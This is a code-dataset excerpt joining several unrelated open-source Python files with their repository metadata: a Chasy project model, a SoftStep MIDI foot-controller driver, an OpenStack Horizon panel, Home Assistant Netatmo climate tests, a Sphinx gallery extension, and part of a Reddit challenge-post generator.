file</b>. Hint: are you sure the saved file has the right
permissions for <i>Chasy</i> to open it?'''
self.emit("disk_operation_problem", problem_description)
return -1
try:
prj = pickle.load(file_)
except:
problem_description = '''Although it was possible to open the
project file, it was <b>impossible to decode the data</b> in
it. Hint: are you sure the saved file is a <i>Chasy</i>
project?'''
self.emit("disk_operation_problem", problem_description)
return -1
file_.close()
# Schema version compatibility check (mostly for future!)
if prj['SCHEMA_VERSION'] != self.SCHEMA_VERSION:
problem_description = '''The project is saved with a <b>schema
version</b> (%s) which is incompatible with the one of the
version of <i>Chasy</i> in use on this system.''' % \
prj['SCHEMA_VERSION']
self.emit("disk_operation_problem", problem_description)
return -1
del prj['SCHEMA_VERSION']
# Verify required module is installed
required = prj['project_settings']['clock']
if required not in installed_modules:
problem_description = '''The saved project is based on the <b>"%s"
clock module</b>, which is not installed on the system in use.
''' % required
self.emit("disk_operation_problem", problem_description)
return -1
for property in prj:
setattr(self, property, prj[property])
self.last_save_fname = fname
self.unsaved_flag = False
self.broadcast_change(skip_flag_setting=True)
def close(self):
'''
Close the current project.
Note that the parameter for the signal is "None" and is a special case
that each handler must process correctly.
'''
self.__reset_project()
self.emit("project_updated", None)
# These lines register specific signals into the GObject framework.
gobject.type_register(Project)
gobject.signal_new("project_updated", Project, gobject.SIGNAL_RUN_FIRST,
gobject.TYPE_NONE, (gobject.TYPE_PYOBJECT,))
gobject.signal_new("disk_operation_problem", Project, gobject.SIGNAL_RUN_FIRST,
gobject.TYPE_NONE, (gobject.TYPE_PYOBJECT,))
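# Usage sketch (hypothetical handler, not part of the original source): other
# components subscribe to the signals registered above with the standard GObject API.
#   def on_update(project, data):
#       pass  # refresh the UI from 'data'
#   prj = Project()
#   prj.connect("project_updated", on_update)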
def run_as_script():
'''Run this code if the file is executed as script.'''
print('Module executed as script!')
if __name__ == '__main__':
run_as_script()
|
quasipedia/Chasy
|
src/models/project.py
|
Python
|
gpl-3.0
| 8,489
|
#!/usr/bin/env python2
# coding: utf-8
'''Code to talk to the softstep foot controller.
Copyright 2014, Matthieu Amiguet
The midi sniffing has been done by Tom Swirly.
https://github.com/rec/swirly/blob/master/js/swirly/softstep/enable.js
This file is part of FooCoCo.
FooCoCo is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
from pygame import midi
import sysex
# CONSTANTS
GREEN = 0
RED = 1
YELLOW = 2
OFF = 0
ON = 1
BLINK = 2
FAST_BLINK = 3
FLASH = 4
# Private functions
def _open_device(name='SSCOM MIDI 1', device_index=1):
'''Opens the midi output device with the given name and device index'''
# This code stinks. Is there any better way to find the device?
for dn in range(midi.get_count()):
md = midi.get_device_info(dn)
if (md[1] == name) and (md[3] == 1): # md[3] == 1 <=> output device
device_index -= 1
if device_index == 0:
return midi.Output(dn)
raise RuntimeError("Could not find a SoftStep Controller")
def _standalone(b):
'''True for going standalone, False for so-called "tethered" mode'''
# It seems to me that Tom's names for sysex messages are reversed,
# but this seems to work
standalone = 0 if b else 1
softstep.write_sys_ex(0, sysex.messages['standalone'][standalone])
softstep.write_sys_ex(0, sysex.messages['tether'][1-standalone])
# Public API
def init(text='HELO', device_index=1):
'''Finds and initializes the device'''
global softstep
midi.init()
softstep = _open_device('SSCOM MIDI 1', device_index)
_standalone(False)
display(text)
reset_leds()
def close(back_to_standalone_mode=True):
'''Closes the device and optionally returns to standalone mode'''
display('Bye')
reset_leds()
if back_to_standalone_mode:
_standalone(True)
# TODO: fix the 'PortMidi: Bad Pointer' error that occurs when closing the midi device
softstep.close()
def backlight(b):
'''True turns backlight on, False turns it off'''
val = 1 if b else 0
softstep.write_sys_ex(0, sysex.messages['backlight'][val])
def led(number, color, mode):
'''Sets led number <led> (numbered from 1 to 10) to given color and mode'''
softstep.write_short(0xB0,40,number-1) # select led, numbered from 0
softstep.write_short(0xB0,41,color) # green = 0, red = 1, yellow = 2
softstep.write_short(0xB0,42,mode) # mode: 0=off, 1=on, 2=blink, 3=fast_blink, 4=flash
softstep.write_short(0xB0,0,0)
softstep.write_short(0xB0,0,0)
softstep.write_short(0xB0,0,0)
def reset_leds():
'''Switch all leds off'''
for l in range(1,11):
for c in range(3):
led(l,c,0)
def display(text):
'''Sets the text on the device's display. The text gets truncated to 4 chars'''
# We want exactly 4 chars in the string
text = text[:4]
text = text + (' ' * (4-len(text)))
# Now send to the device
for n, c in enumerate(text):
softstep.write_short(176,50+n,ord(c))
if __name__ == '__main__':
# Direct use example
init()
backlight(False)
led(1,GREEN,ON)
led(2,RED,ON)
led(3,YELLOW,ON)
import time
time.sleep(2)
backlight(True)
display('Cool')
led(6,GREEN,BLINK)
led(7,RED,FAST_BLINK)
led(8,YELLOW,FLASH)
time.sleep(2)
backlight(False)
close()
|
amiguet/foococo
|
hardware.py
|
Python
|
gpl-3.0
| 3,998
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from django.utils.translation import ugettext_lazy as _
import horizon_lib
from openstack_horizon.api import nova
from openstack_horizon.dashboards.admin import dashboard
class Aggregates(horizon_lib.Panel):
name = _("Host Aggregates")
slug = 'aggregates'
permissions = ('openstack.services.compute',)
def can_access(self, context):
# extend basic permission-based check with a check to see whether
# the Aggregates extension is even enabled in nova
if not nova.extension_supported('Aggregates', context['request']):
return False
return super(Aggregates, self).can_access(context)
dashboard.Admin.register(Aggregates)
|
mrunge/openstack_horizon
|
openstack_horizon/dashboards/admin/aggregates/panel.py
|
Python
|
apache-2.0
| 1,258
|
"""The tests for the Netatmo climate platform."""
from unittest.mock import Mock, patch
from homeassistant.components.climate import (
DOMAIN as CLIMATE_DOMAIN,
SERVICE_SET_HVAC_MODE,
SERVICE_SET_PRESET_MODE,
SERVICE_SET_TEMPERATURE,
SERVICE_TURN_OFF,
SERVICE_TURN_ON,
)
from homeassistant.components.climate.const import (
ATTR_HVAC_MODE,
ATTR_PRESET_MODE,
HVAC_MODE_AUTO,
HVAC_MODE_HEAT,
HVAC_MODE_OFF,
PRESET_AWAY,
PRESET_BOOST,
)
from homeassistant.components.netatmo import climate
from homeassistant.components.netatmo.climate import PRESET_FROST_GUARD, PRESET_SCHEDULE
from homeassistant.components.netatmo.const import (
ATTR_SCHEDULE_NAME,
SERVICE_SET_SCHEDULE,
)
from homeassistant.const import ATTR_ENTITY_ID, ATTR_TEMPERATURE, CONF_WEBHOOK_ID
from .common import selected_platforms, simulate_webhook
async def test_webhook_event_handling_thermostats(hass, config_entry, netatmo_auth):
"""Test service and webhook event handling with thermostats."""
with selected_platforms(["climate"]):
await hass.config_entries.async_setup(config_entry.entry_id)
await hass.async_block_till_done()
webhook_id = config_entry.data[CONF_WEBHOOK_ID]
climate_entity_livingroom = "climate.netatmo_livingroom"
assert hass.states.get(climate_entity_livingroom).state == "auto"
assert (
hass.states.get(climate_entity_livingroom).attributes["preset_mode"]
== "Schedule"
)
assert hass.states.get(climate_entity_livingroom).attributes["temperature"] == 12
# Test service setting the temperature
await hass.services.async_call(
CLIMATE_DOMAIN,
SERVICE_SET_TEMPERATURE,
{ATTR_ENTITY_ID: climate_entity_livingroom, ATTR_TEMPERATURE: 21},
blocking=True,
)
await hass.async_block_till_done()
# Fake webhook thermostat manual set point
response = {
"room_id": "2746182631",
"home": {
"id": "91763b24c43d3e344f424e8b",
"name": "MYHOME",
"country": "DE",
"rooms": [
{
"id": "2746182631",
"name": "Livingroom",
"type": "livingroom",
"therm_setpoint_mode": "manual",
"therm_setpoint_temperature": 21,
"therm_setpoint_end_time": 1612734552,
}
],
"modules": [
{"id": "12:34:56:00:01:ae", "name": "Livingroom", "type": "NATherm1"}
],
},
"mode": "manual",
"event_type": "set_point",
"temperature": 21,
"push_type": "display_change",
}
await simulate_webhook(hass, webhook_id, response)
assert hass.states.get(climate_entity_livingroom).state == "heat"
assert (
hass.states.get(climate_entity_livingroom).attributes["preset_mode"]
== "Schedule"
)
assert hass.states.get(climate_entity_livingroom).attributes["temperature"] == 21
# Test service setting the HVAC mode to "heat"
await hass.services.async_call(
CLIMATE_DOMAIN,
SERVICE_SET_HVAC_MODE,
{ATTR_ENTITY_ID: climate_entity_livingroom, ATTR_HVAC_MODE: HVAC_MODE_HEAT},
blocking=True,
)
await hass.async_block_till_done()
# Fake webhook thermostat mode change to "Max"
response = {
"room_id": "2746182631",
"home": {
"id": "91763b24c43d3e344f424e8b",
"name": "MYHOME",
"country": "DE",
"rooms": [
{
"id": "2746182631",
"name": "Livingroom",
"type": "livingroom",
"therm_setpoint_mode": "max",
"therm_setpoint_end_time": 1612749189,
}
],
"modules": [
{"id": "12:34:56:00:01:ae", "name": "Livingroom", "type": "NATherm1"}
],
},
"mode": "max",
"event_type": "set_point",
"push_type": "display_change",
}
await simulate_webhook(hass, webhook_id, response)
assert hass.states.get(climate_entity_livingroom).state == "heat"
assert hass.states.get(climate_entity_livingroom).attributes["temperature"] == 30
# Test service setting the HVAC mode to "off"
await hass.services.async_call(
CLIMATE_DOMAIN,
SERVICE_SET_HVAC_MODE,
{ATTR_ENTITY_ID: climate_entity_livingroom, ATTR_HVAC_MODE: HVAC_MODE_OFF},
blocking=True,
)
await hass.async_block_till_done()
# Fake webhook turn thermostat off
response = {
"home": {
"id": "91763b24c43d3e344f424e8b",
"name": "MYHOME",
"country": "DE",
"rooms": [
{
"id": "2746182631",
"name": "Livingroom",
"type": "livingroom",
"therm_setpoint_mode": "off",
}
],
"modules": [
{"id": "12:34:56:00:01:ae", "name": "Livingroom", "type": "NATherm1"}
],
},
"mode": "off",
"event_type": "set_point",
"push_type": "display_change",
}
await simulate_webhook(hass, webhook_id, response)
assert hass.states.get(climate_entity_livingroom).state == "off"
# Test service setting the HVAC mode to "auto"
await hass.services.async_call(
CLIMATE_DOMAIN,
SERVICE_SET_HVAC_MODE,
{ATTR_ENTITY_ID: climate_entity_livingroom, ATTR_HVAC_MODE: HVAC_MODE_AUTO},
blocking=True,
)
await hass.async_block_till_done()
# Fake webhook thermostat mode cancel set point
response = {
"room_id": "2746182631",
"home": {
"id": "91763b24c43d3e344f424e8b",
"name": "MYHOME",
"country": "DE",
"rooms": [
{
"id": "2746182631",
"name": "Livingroom",
"type": "livingroom",
"therm_setpoint_mode": "home",
}
],
"modules": [
{"id": "12:34:56:00:01:ae", "name": "Livingroom", "type": "NATherm1"}
],
},
"mode": "home",
"event_type": "cancel_set_point",
"push_type": "display_change",
}
await simulate_webhook(hass, webhook_id, response)
assert hass.states.get(climate_entity_livingroom).state == "auto"
assert (
hass.states.get(climate_entity_livingroom).attributes["preset_mode"]
== "Schedule"
)
async def test_service_preset_mode_frost_guard_thermostat(
hass, config_entry, netatmo_auth
):
"""Test service with frost guard preset for thermostats."""
with selected_platforms(["climate"]):
await hass.config_entries.async_setup(config_entry.entry_id)
await hass.async_block_till_done()
webhook_id = config_entry.data[CONF_WEBHOOK_ID]
climate_entity_livingroom = "climate.netatmo_livingroom"
assert hass.states.get(climate_entity_livingroom).state == "auto"
assert (
hass.states.get(climate_entity_livingroom).attributes["preset_mode"]
== "Schedule"
)
# Test service setting the preset mode to "frost guard"
await hass.services.async_call(
CLIMATE_DOMAIN,
SERVICE_SET_PRESET_MODE,
{
ATTR_ENTITY_ID: climate_entity_livingroom,
ATTR_PRESET_MODE: PRESET_FROST_GUARD,
},
blocking=True,
)
await hass.async_block_till_done()
# Fake webhook thermostat mode change to "Frost Guard"
response = {
"event_type": "therm_mode",
"home": {"id": "91763b24c43d3e344f424e8b", "therm_mode": "hg"},
"mode": "hg",
"previous_mode": "schedule",
"push_type": "home_event_changed",
}
await simulate_webhook(hass, webhook_id, response)
assert hass.states.get(climate_entity_livingroom).state == "auto"
assert (
hass.states.get(climate_entity_livingroom).attributes["preset_mode"]
== "Frost Guard"
)
# Test service setting the preset mode to "frost guard"
await hass.services.async_call(
CLIMATE_DOMAIN,
SERVICE_SET_PRESET_MODE,
{
ATTR_ENTITY_ID: climate_entity_livingroom,
ATTR_PRESET_MODE: PRESET_SCHEDULE,
},
blocking=True,
)
await hass.async_block_till_done()
# Test webhook thermostat mode change to "Schedule"
response = {
"event_type": "therm_mode",
"home": {"id": "91763b24c43d3e344f424e8b", "therm_mode": "schedule"},
"mode": "schedule",
"previous_mode": "hg",
"push_type": "home_event_changed",
}
await simulate_webhook(hass, webhook_id, response)
assert hass.states.get(climate_entity_livingroom).state == "auto"
assert (
hass.states.get(climate_entity_livingroom).attributes["preset_mode"]
== "Schedule"
)
async def test_service_preset_modes_thermostat(hass, config_entry, netatmo_auth):
"""Test service with preset modes for thermostats."""
with selected_platforms(["climate"]):
await hass.config_entries.async_setup(config_entry.entry_id)
await hass.async_block_till_done()
webhook_id = config_entry.data[CONF_WEBHOOK_ID]
climate_entity_livingroom = "climate.netatmo_livingroom"
assert hass.states.get(climate_entity_livingroom).state == "auto"
assert (
hass.states.get(climate_entity_livingroom).attributes["preset_mode"]
== "Schedule"
)
# Test service setting the preset mode to "away"
await hass.services.async_call(
CLIMATE_DOMAIN,
SERVICE_SET_PRESET_MODE,
{ATTR_ENTITY_ID: climate_entity_livingroom, ATTR_PRESET_MODE: PRESET_AWAY},
blocking=True,
)
await hass.async_block_till_done()
# Fake webhook thermostat mode change to "Away"
response = {
"event_type": "therm_mode",
"home": {"id": "91763b24c43d3e344f424e8b", "therm_mode": "away"},
"mode": "away",
"previous_mode": "schedule",
"push_type": "home_event_changed",
}
await simulate_webhook(hass, webhook_id, response)
assert hass.states.get(climate_entity_livingroom).state == "auto"
assert (
hass.states.get(climate_entity_livingroom).attributes["preset_mode"] == "away"
)
# Test service setting the preset mode to "boost"
await hass.services.async_call(
CLIMATE_DOMAIN,
SERVICE_SET_PRESET_MODE,
{ATTR_ENTITY_ID: climate_entity_livingroom, ATTR_PRESET_MODE: PRESET_BOOST},
blocking=True,
)
await hass.async_block_till_done()
# Test webhook thermostat mode change to "Max"
response = {
"room_id": "2746182631",
"home": {
"id": "91763b24c43d3e344f424e8b",
"name": "MYHOME",
"country": "DE",
"rooms": [
{
"id": "2746182631",
"name": "Livingroom",
"type": "livingroom",
"therm_setpoint_mode": "max",
"therm_setpoint_end_time": 1612749189,
}
],
"modules": [
{"id": "12:34:56:00:01:ae", "name": "Livingroom", "type": "NATherm1"}
],
},
"mode": "max",
"event_type": "set_point",
"push_type": "display_change",
}
await simulate_webhook(hass, webhook_id, response)
assert hass.states.get(climate_entity_livingroom).state == "heat"
assert hass.states.get(climate_entity_livingroom).attributes["temperature"] == 30
async def test_webhook_event_handling_no_data(hass, config_entry, netatmo_auth):
"""Test service and webhook event handling with erroneous data."""
with selected_platforms(["climate"]):
await hass.config_entries.async_setup(config_entry.entry_id)
await hass.async_block_till_done()
# Test webhook without home entry
webhook_id = config_entry.data[CONF_WEBHOOK_ID]
response = {
"push_type": "home_event_changed",
}
await simulate_webhook(hass, webhook_id, response)
# Test webhook with different home id
response = {
"home_id": "3d3e344f491763b24c424e8b",
"room_id": "2746182631",
"home": {
"id": "3d3e344f491763b24c424e8b",
"name": "MYHOME",
"country": "DE",
"rooms": [],
"modules": [],
},
"mode": "home",
"event_type": "cancel_set_point",
"push_type": "display_change",
}
await simulate_webhook(hass, webhook_id, response)
# Test webhook without room entries
response = {
"room_id": "2746182631",
"home": {
"id": "91763b24c43d3e344f424e8b",
"name": "MYHOME",
"country": "DE",
"rooms": [],
"modules": [],
},
"mode": "home",
"event_type": "cancel_set_point",
"push_type": "display_change",
}
await simulate_webhook(hass, webhook_id, response)
async def test_service_schedule_thermostats(hass, config_entry, caplog, netatmo_auth):
"""Test service for selecting Netatmo schedule with thermostats."""
with selected_platforms(["climate"]):
await hass.config_entries.async_setup(config_entry.entry_id)
await hass.async_block_till_done()
webhook_id = config_entry.data[CONF_WEBHOOK_ID]
climate_entity_livingroom = "climate.netatmo_livingroom"
# Test setting a valid schedule
with patch(
"pyatmo.thermostat.AsyncHomeData.async_switch_home_schedule"
) as mock_switch_home_schedule:
await hass.services.async_call(
"netatmo",
SERVICE_SET_SCHEDULE,
{ATTR_ENTITY_ID: climate_entity_livingroom, ATTR_SCHEDULE_NAME: "Winter"},
blocking=True,
)
await hass.async_block_till_done()
mock_switch_home_schedule.assert_called_once_with(
home_id="91763b24c43d3e344f424e8b", schedule_id="b1b54a2f45795764f59d50d8"
)
# Fake backend response for valve being turned on
response = {
"event_type": "schedule",
"schedule_id": "b1b54a2f45795764f59d50d8",
"previous_schedule_id": "59d32176d183948b05ab4dce",
"push_type": "home_event_changed",
}
await simulate_webhook(hass, webhook_id, response)
assert (
hass.states.get(climate_entity_livingroom).attributes["selected_schedule"]
== "Winter"
)
# Test setting an invalid schedule
with patch(
"pyatmo.thermostat.AsyncHomeData.async_switch_home_schedule"
) as mock_switch_home_schedule:
await hass.services.async_call(
"netatmo",
SERVICE_SET_SCHEDULE,
{ATTR_ENTITY_ID: climate_entity_livingroom, ATTR_SCHEDULE_NAME: "summer"},
blocking=True,
)
await hass.async_block_till_done()
mock_switch_home_schedule.assert_not_called()
assert "summer is not a valid schedule" in caplog.text
async def test_service_preset_mode_already_boost_valves(
hass, config_entry, netatmo_auth
):
"""Test service with boost preset for valves when already in boost mode."""
with selected_platforms(["climate"]):
await hass.config_entries.async_setup(config_entry.entry_id)
await hass.async_block_till_done()
webhook_id = config_entry.data[CONF_WEBHOOK_ID]
climate_entity_entrada = "climate.netatmo_entrada"
assert hass.states.get(climate_entity_entrada).state == "auto"
assert (
hass.states.get(climate_entity_entrada).attributes["preset_mode"]
== "Frost Guard"
)
assert hass.states.get(climate_entity_entrada).attributes["temperature"] == 7
# Test webhook valve mode change to "Max"
response = {
"room_id": "2833524037",
"home": {
"id": "91763b24c43d3e344f424e8b",
"name": "MYHOME",
"country": "DE",
"rooms": [
{
"id": "2833524037",
"name": "Entrada",
"type": "lobby",
"therm_setpoint_mode": "max",
"therm_setpoint_end_time": 1612749189,
}
],
"modules": [{"id": "12:34:56:00:01:ae", "name": "Entrada", "type": "NRV"}],
},
"mode": "max",
"event_type": "set_point",
"push_type": "display_change",
}
await simulate_webhook(hass, webhook_id, response)
# Test service setting the preset mode to "boost"
await hass.services.async_call(
CLIMATE_DOMAIN,
SERVICE_SET_PRESET_MODE,
{ATTR_ENTITY_ID: climate_entity_entrada, ATTR_PRESET_MODE: PRESET_BOOST},
blocking=True,
)
await hass.async_block_till_done()
# Test webhook valve mode change to "Max"
response = {
"room_id": "2833524037",
"home": {
"id": "91763b24c43d3e344f424e8b",
"name": "MYHOME",
"country": "DE",
"rooms": [
{
"id": "2833524037",
"name": "Entrada",
"type": "lobby",
"therm_setpoint_mode": "max",
"therm_setpoint_end_time": 1612749189,
}
],
"modules": [{"id": "12:34:56:00:01:ae", "name": "Entrada", "type": "NRV"}],
},
"mode": "max",
"event_type": "set_point",
"push_type": "display_change",
}
await simulate_webhook(hass, webhook_id, response)
assert hass.states.get(climate_entity_entrada).state == "heat"
assert hass.states.get(climate_entity_entrada).attributes["temperature"] == 30
async def test_service_preset_mode_boost_valves(hass, config_entry, netatmo_auth):
"""Test service with boost preset for valves."""
with selected_platforms(["climate"]):
await hass.config_entries.async_setup(config_entry.entry_id)
await hass.async_block_till_done()
webhook_id = config_entry.data[CONF_WEBHOOK_ID]
climate_entity_entrada = "climate.netatmo_entrada"
# Test service setting the preset mode to "boost"
assert hass.states.get(climate_entity_entrada).state == "auto"
assert hass.states.get(climate_entity_entrada).attributes["temperature"] == 7
await hass.services.async_call(
CLIMATE_DOMAIN,
SERVICE_SET_PRESET_MODE,
{ATTR_ENTITY_ID: climate_entity_entrada, ATTR_PRESET_MODE: PRESET_BOOST},
blocking=True,
)
await hass.async_block_till_done()
# Fake backend response
response = {
"room_id": "2833524037",
"home": {
"id": "91763b24c43d3e344f424e8b",
"name": "MYHOME",
"country": "DE",
"rooms": [
{
"id": "2833524037",
"name": "Entrada",
"type": "lobby",
"therm_setpoint_mode": "max",
"therm_setpoint_end_time": 1612749189,
}
],
"modules": [{"id": "12:34:56:00:01:ae", "name": "Entrada", "type": "NRV"}],
},
"mode": "max",
"event_type": "set_point",
"push_type": "display_change",
}
await simulate_webhook(hass, webhook_id, response)
assert hass.states.get(climate_entity_entrada).state == "heat"
assert hass.states.get(climate_entity_entrada).attributes["temperature"] == 30
async def test_service_preset_mode_invalid(hass, config_entry, caplog, netatmo_auth):
"""Test service with invalid preset."""
with selected_platforms(["climate"]):
await hass.config_entries.async_setup(config_entry.entry_id)
await hass.async_block_till_done()
await hass.services.async_call(
CLIMATE_DOMAIN,
SERVICE_SET_PRESET_MODE,
{ATTR_ENTITY_ID: "climate.netatmo_cocina", ATTR_PRESET_MODE: "invalid"},
blocking=True,
)
await hass.async_block_till_done()
assert "Preset mode 'invalid' not available" in caplog.text
async def test_valves_service_turn_off(hass, config_entry, netatmo_auth):
"""Test service turn off for valves."""
with selected_platforms(["climate"]):
await hass.config_entries.async_setup(config_entry.entry_id)
await hass.async_block_till_done()
webhook_id = config_entry.data[CONF_WEBHOOK_ID]
climate_entity_entrada = "climate.netatmo_entrada"
# Test turning valve off
await hass.services.async_call(
CLIMATE_DOMAIN,
SERVICE_TURN_OFF,
{ATTR_ENTITY_ID: climate_entity_entrada},
blocking=True,
)
await hass.async_block_till_done()
# Fake backend response for valve being turned off
response = {
"room_id": "2833524037",
"home": {
"id": "91763b24c43d3e344f424e8b",
"name": "MYHOME",
"country": "DE",
"rooms": [
{
"id": "2833524037",
"name": "Entrada",
"type": "lobby",
"therm_setpoint_mode": "off",
}
],
"modules": [{"id": "12:34:56:00:01:ae", "name": "Entrada", "type": "NRV"}],
},
"mode": "off",
"event_type": "set_point",
"push_type": "display_change",
}
await simulate_webhook(hass, webhook_id, response)
assert hass.states.get(climate_entity_entrada).state == "off"
async def test_valves_service_turn_on(hass, config_entry, netatmo_auth):
"""Test service turn on for valves."""
with selected_platforms(["climate"]):
await hass.config_entries.async_setup(config_entry.entry_id)
await hass.async_block_till_done()
webhook_id = config_entry.data[CONF_WEBHOOK_ID]
climate_entity_entrada = "climate.netatmo_entrada"
# Test turning valve on
await hass.services.async_call(
CLIMATE_DOMAIN,
SERVICE_TURN_ON,
{ATTR_ENTITY_ID: climate_entity_entrada},
blocking=True,
)
await hass.async_block_till_done()
# Fake backend response for valve being turned on
response = {
"room_id": "2833524037",
"home": {
"id": "91763b24c43d3e344f424e8b",
"name": "MYHOME",
"country": "DE",
"rooms": [
{
"id": "2833524037",
"name": "Entrada",
"type": "lobby",
"therm_setpoint_mode": "home",
}
],
"modules": [{"id": "12:34:56:00:01:ae", "name": "Entrada", "type": "NRV"}],
},
"mode": "home",
"event_type": "cancel_set_point",
"push_type": "display_change",
}
await simulate_webhook(hass, webhook_id, response)
assert hass.states.get(climate_entity_entrada).state == "auto"
async def test_get_all_home_ids():
"""Test extracting all home ids returned by NetAtmo API."""
# Test with backend returning no data
assert climate.get_all_home_ids(None) == []
# Test with fake data
home_data = Mock()
home_data.homes = {
"123": {"id": "123", "name": "Home 1", "modules": [], "therm_schedules": []},
"987": {"id": "987", "name": "Home 2", "modules": [], "therm_schedules": []},
}
expected = ["123", "987"]
assert climate.get_all_home_ids(home_data) == expected
async def test_webhook_home_id_mismatch(hass, config_entry, netatmo_auth):
"""Test service turn on for valves."""
with selected_platforms(["climate"]):
await hass.config_entries.async_setup(config_entry.entry_id)
await hass.async_block_till_done()
webhook_id = config_entry.data[CONF_WEBHOOK_ID]
climate_entity_entrada = "climate.netatmo_entrada"
assert hass.states.get(climate_entity_entrada).state == "auto"
# Fake backend response for valve being turned on
response = {
"room_id": "2833524037",
"home": {
"id": "123",
"name": "MYHOME",
"country": "DE",
"rooms": [
{
"id": "2833524037",
"name": "Entrada",
"type": "lobby",
"therm_setpoint_mode": "home",
}
],
"modules": [{"id": "12:34:56:00:01:ae", "name": "Entrada", "type": "NRV"}],
},
"mode": "home",
"event_type": "cancel_set_point",
"push_type": "display_change",
}
await simulate_webhook(hass, webhook_id, response)
assert hass.states.get(climate_entity_entrada).state == "auto"
async def test_webhook_set_point(hass, config_entry, netatmo_auth):
"""Test service turn on for valves."""
with selected_platforms(["climate"]):
await hass.config_entries.async_setup(config_entry.entry_id)
await hass.async_block_till_done()
webhook_id = config_entry.data[CONF_WEBHOOK_ID]
climate_entity_entrada = "climate.netatmo_entrada"
# Fake backend response for valve being turned on
response = {
"room_id": "2746182631",
"home": {
"id": "91763b24c43d3e344f424e8b",
"name": "MYHOME",
"country": "DE",
"rooms": [
{
"id": "2833524037",
"name": "Entrada",
"type": "lobby",
"therm_setpoint_mode": "home",
"therm_setpoint_temperature": 30,
}
],
"modules": [{"id": "12:34:56:00:01:ae", "name": "Entrada", "type": "NRV"}],
},
"mode": "home",
"event_type": "set_point",
"temperature": 21,
"push_type": "display_change",
}
await simulate_webhook(hass, webhook_id, response)
assert hass.states.get(climate_entity_entrada).state == "heat"
|
Danielhiversen/home-assistant
|
tests/components/netatmo/test_climate.py
|
Python
|
apache-2.0
| 26,123
|
import os
from example_builder import ExampleBuilder
RST_TEMPLATE = """
.. _%(sphinx_tag)s:
%(docstring)s
%(image_list)s
.. raw:: html
<div class="toggle_trigger"><a href="#">
**Code output:**
.. raw:: html
</a></div>
<div class="toggle_container">
.. literalinclude:: %(stdout)s
.. raw:: html
</div>
<div class="toggle_trigger" id="start_open"><a href="#">
**Python source code:**
.. raw:: html
</a></div>
<div class="toggle_container">
.. literalinclude:: %(fname)s
:lines: %(end_line)s-
.. raw:: html
</div>
<div align="right">
:download:`[download source: %(fname)s] <%(fname)s>`
.. raw:: html
</div>
"""
def main(app):
target_dir = os.path.join(app.builder.srcdir, 'book_figures')
source_dir = os.path.abspath(app.builder.srcdir + '/../' + 'examples')
try:
plot_gallery = eval(app.builder.config.plot_gallery)
except TypeError:
plot_gallery = bool(app.builder.config.plot_gallery)
if not os.path.exists(source_dir):
os.makedirs(source_dir)
if not os.path.exists(target_dir):
os.makedirs(target_dir)
EB = ExampleBuilder(source_dir, target_dir,
execute_files=plot_gallery,
contents_file='contents.txt',
dir_info_file='README.rst',
dir_footer_file='FOOTER.rst',
sphinx_tag_base='book_fig',
template_example=RST_TEMPLATE)
EB.run()
def setup(app):
app.connect('builder-inited', main)
#app.add_config_value('plot_gallery', True, 'html')
|
cigroup-ol/metaopt
|
docs/_extensions/gen_figure_rst.py
|
Python
|
bsd-3-clause
| 1,626
|
#!/usr/bin/python
from participantCollection import ParticipantCollection
import string
import re
import datetime
import pyperclip
# Edit Me!
# Remember, this is during signup, so the "current" month is the month before the challenge month.
currentMonthTotalDays = 31
currentMonthURL = "https://www.reddit.com/r/pornfree/comments/5lefq1/stay_clean_january_this_thread_updated_daily/"
currentMonthIndex = datetime.date.today().month
currentMonthPenultimateDayIndex = currentMonthTotalDays - 1
currentMonthName = {1: 'January', 2: 'February', 3: 'March', 4: 'April', 5: 'May', 6: 'June', 7: 'July', 8: 'August', 9: 'September', 10: 'October', 11: 'November', 12: 'December'}[currentMonthIndex]
nextMonthIndex = currentMonthIndex % 12 + 1
nextMonthName = {1: 'January', 2: 'February', 3: 'March', 4: 'April', 5: 'May', 6: 'June', 7: 'July', 8: 'August', 9: 'September', 10: 'October', 11: 'November', 12: 'December'}[nextMonthIndex]
uppercaseMonth = string.upper(nextMonthName)
currentDayOfMonthIndex = datetime.date.today().day
currentDayOfMonthName = {1: 'first', 2: 'second', 3: 'third', 4: 'fourth', 5: 'fifth', 6: 'sixth', 7: 'seventh', 8: 'eighth', 9: 'ninth', 10: 'tenth', 11: 'eleventh', 12: 'twelfth', 13: 'thirteenth', 14: 'fourteenth', 15: 'fifteenth', 16: 'sixteenth', 17: 'seventeenth', 18: 'eighteenth', 19: 'nineteenth', 20: 'twentieth', 21: 'twenty-first', 22: 'twenty-second', 23: 'twenty-third', 24: 'twenty-fourth', 25: 'twenty-fifth', 26: 'twenty-sixth', 27: 'twenty-seventh', 28: 'twenty-eighth', 29: 'twenty-ninth', 30: 'thirtieth', 31: 'thirty-first'}[currentDayOfMonthIndex]
currentDayOfWeekName = {0: 'Monday', 1: 'Tuesday', 2: 'Wednesday', 3: 'Thursday', 4: 'Friday', 5: 'Saturday', 6: 'Sunday'}[datetime.date.today().weekday()]
# TODO: testing
# currentDayOfMonthIndex = 28
participants = ParticipantCollection()
initialNumber = participants.size()
def templateForParticipants():
answer = ""
answer += "Here are the **INITIAL_NUMBER participants** who have already signed up:\n\n"
for participant in participants.participants:
answer += "/u/" + participant.name
answer += "\n\n"
return answer
def templateForTooEarly():
answer = ""
answer += "(Too early. Come back on CURRENT_MONTH_NAME " + str(currentMonthTotalDays - 6) + ")\n"
return answer
def templateForFirstSignupDay():
answer = ""
answer += "STAY CLEAN UPPERCASE_MONTH! Sign up here! (CURRENT_MONTH_NAME CURRENT_DAY_OF_MONTH_INDEX)\n"
